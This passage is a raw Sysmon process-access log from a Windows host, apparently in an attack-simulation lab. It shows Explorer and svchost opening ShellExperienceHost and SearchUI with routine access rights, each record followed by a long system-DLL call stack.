4e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000012035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000012034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37845308C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\SHCORE.dll+35576|C:\Windows\System32\SHCORE.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6e17|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 